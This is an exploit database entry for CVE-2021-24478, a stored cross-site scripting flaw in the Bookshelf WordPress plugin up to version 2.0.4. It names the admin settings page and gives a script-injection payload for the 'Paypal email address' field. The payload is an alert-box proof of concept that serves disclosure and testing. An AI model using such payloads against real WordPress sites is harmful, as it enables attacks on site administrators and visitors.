Exploit for Bookshelf <= 2.0.4 - Authenticated Stored Cross-Site Scripting (XSS) CVE-2021-24478

Name: Exploit for Bookshelf <= 2.0.4 - Authenticated Stored Cross-Site Scripting (XSS) CVE-2021-24478
Rating: 5 (50 reviews)

2021-06-28 | CVSS 3.5

## https://sploitus.com/exploit?id=WPEX-ID:C73818E5-0734-46C9-9703-D211B4F58664
Add the following payload in the "Paypal email address" setting of the plugin (/wp-admin/admin.php?page=bookshelf-settings): "><script>alert(/XSS/)</script>